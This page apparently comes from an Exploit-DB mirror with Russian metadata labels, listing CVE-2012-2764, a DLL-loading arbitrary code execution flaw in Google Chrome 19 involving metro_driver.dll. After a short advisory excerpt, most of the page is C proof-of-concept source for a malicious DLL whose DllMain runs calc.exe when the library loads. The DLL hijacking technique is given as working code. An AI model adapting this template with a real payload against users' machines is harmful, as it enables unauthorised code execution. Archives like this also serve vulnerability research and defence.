- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 37510
- Проверка EDB
-
- Пройдено
- Автор
- MOSHE ZIONI
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2012-2764
- Дата публикации
- 2012-06-26
Google Chrome 19.0.1084.52 - 'metro_driver.dll' DLL Loading Arbitrary Code Execution
C:
/*
source: https://www.securityfocus.com/bid/54477/info
Google Chrome is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Linked Library (DLL) file.
Google Chrome 19.0.1084.21 through versions 20.0.1132.23 are vulnerable.
Note: This issue was previously discussed in BID 54203 (Google Chrome Prior to 20.0.1132.43 Multiple Security Vulnerabilities), but has been given its own record to better document it.
*/
#include <windows.h>
int hijack_poc ()
{
WinExec ( "calc.exe" , SW_NORMAL );
return 0 ;
}
BOOL WINAPI DllMain
( HINSTANCE hinstDLL ,
DWORD dwReason ,
LPVOID lpvReserved )
{
hijack_poc () ;
return 0 ;
}- Источник
- www.exploit-db.com
